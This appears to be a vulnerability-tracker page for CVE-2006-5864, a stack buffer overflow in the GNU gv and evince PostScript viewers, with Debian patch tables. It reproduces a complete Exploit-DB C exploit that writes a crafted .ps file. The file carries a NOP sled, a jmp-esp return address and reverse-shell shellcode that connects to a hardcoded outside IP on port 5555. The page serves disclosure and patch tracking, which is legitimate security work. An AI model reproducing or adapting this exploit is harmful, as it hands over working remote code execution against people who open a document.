CVE-2006-5864

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Stack-based buffer overflow in the ps_gettext function in ps.c for GNU gv 3.6.2, and possibly earlier versions, allows user-assisted attackers to execute arbitrary code via a PostScript (PS) file with certain headers that contain long comments, as demonstrated using the (1) DocumentMedia, (2) DocumentPaperSizes, and possibly (3) PageMedia and (4) PaperSize headers. NOTE: this issue can be exploited through other products that use gv such as evince.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

Mitigation details

Source: Debian Security Tracker · View original ↗ · DFSG

CVE-2006-5864 NameCVE-2006-5864 DescriptionStack-based buffer overflow in the ps_gettext function in ps.c for GNU gv 3.6.2, and possibly earlier versions, allows user-assisted attackers to execute arbitrary code via a PostScript (PS) file with certain headers that contain long comments, as demonstrated using the (1) DocumentMedia, (2) DocumentPaperSizes, and possibly (3) PageMedia and (4)…

CVE-2006-5864

Name	CVE-2006-5864
Description	Stack-based buffer overflow in the ps_gettext function in ps.c for GNU gv 3.6.2, and possibly earlier versions, allows user-assisted attackers to execute arbitrary code via a PostScript (PS) file with certain headers that contain long comments, as demonstrated using the (1) DocumentMedia, (2) DocumentPaperSizes, and possibly (3) PageMedia and (4) PaperSize headers. NOTE: this issue can be exploited through other products that use gv such as evince.
Source	CVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more)
References	DSA-1214-1, DSA-1214-2, DSA-1243-1
Debian Bugs	398292, 400904, 400906, 402063

Vulnerable and fixed packages

The table below lists information on source packages.

Source Package	Release	Version	Status
evince (PTS)	bullseye	3.38.2-1	fixed
	bullseye (security)	3.38.2-1+deb11u1	fixed
	bookworm	43.1-2	fixed
	bookworm (security)	43.1-2+deb12u1	fixed
	trixie	48.1-3	fixed
	trixie (security)	48.1-3+deb13u1	fixed
	forky, sid	49~alpha.1-1	fixed
gv (PTS)	bookworm, bullseye	1:3.7.4-2	fixed
	trixie	1:3.7.4-3.1	fixed
	forky, sid	1:3.7.4-3.2	fixed

The information below is based on the following data on fixed versions.

Package	Type	Release	Fixed Version	Urgency	Origin	Debian Bugs
evince	source	sarge	0.1.5-2sarge1		DSA-1243-1
evince	source	(unstable)	0.4.0-3	medium		400904, 400906, 402063
gv	source	sarge	1:3.6.1-10sarge2		DSA-1214-2
gv	source	(unstable)	1:3.6.2-3	medium		398292

Home - Debian Security - Source (Git)

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-2858 remote linux verified text · 2 KB

K-sPecial · 2006-11-28

Evince Document Viewer - 'DocumentMedia' Remote Buffer Overflow

text exploit Source: Exploit-DB

/*
 * Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: evince-ps-field-bof.c
 * Date: 11/27/2006
 * Version: 
 * 	1.00 - creation
 *
 * Other: this idea originaly came from the bid for the 'gv' buffer overflow (20978), i don't
 *  believe it's known until now that evince is also vulnerable. 
 *
 * Compile: gcc -o epfb evince-ps-field-bof.c -std=c99
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>

// insert shellcode here, i'm not going to implement ip/port changing since
// metasploit's shellcode generation engine does it just fine. i had a picky time
// with the shellcodes, there must be some bad bytes. this shellcode from 
// metasploit works but be SURE to set Encoder=None

/* linux_ia32_reverse -  LHOST=67.76.107.14 LPORT=5555 Size=70 Encoder=None http://metasploit.com */
char cb[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x43\x4c\x6b\x0e\x66\x68"
"\x15\xb3\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

// location of "jmp *%esp"
char jmpesp[] = "\x77\xe7\xff\xff";

int main (int argc, char **argv) {
	FILE *fh;

	if (!(fh = fopen(*(argv+1), "w+b"))) { 
		printf("%s <file.ps>\n\n", *(argv));
		printf("[-] unable to open file '%s' for writing: %s\n", *(argv+1), strerror(errno));
		exit(1);
	}

	fputs("%!PS-Adobe-3.0\n", fh);
	fputs("%%Title: hello.ps\n", fh);
	fputs("%%For: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n", fh);
	fputs("%%BoundingBox: 24 24 588 768\n", fh);
	fputs("%%DocumentMedia: ", fh);
	for (int i = 0; i < 100; i++) 
		fputc(0x90, fh);

	fwrite(cb, strlen(cb), 1, fh);

	for (int i = strlen(cb) + 100; i < 273; i++) 
		fputc('A', fh);

	fwrite(jmpesp, 4, 1, fh);
	fwrite("\xe9\x02\xff\xff\xff", 5, 1, fh);

	fputc('\n', fh);

	fputs("%%DocumentData: Clean7Bit\n", fh);
	fputs("%%Orientation: Landscape\n", fh);
	fputs("%%Pages: 1\n", fh);
	fputs("%%PageOrder: Ascend\n", fh);
	fputs("%%+ encoding ISO-8859-1Encoding\n", fh);
	fputs("%%EndComments\n", fh);

	return(0);
}

// milw0rm.com [2006-11-28]

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`0.4.0-3`
sid	Fixed	`0.4.0-3`
forky	Fixed	`0.4.0-3`
bullseye	Fixed	`0.4.0-3`
bookworm	Fixed	`0.4.0-3`

References

https://security-tracker.debian.org/tracker/CVE-2006-5864

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.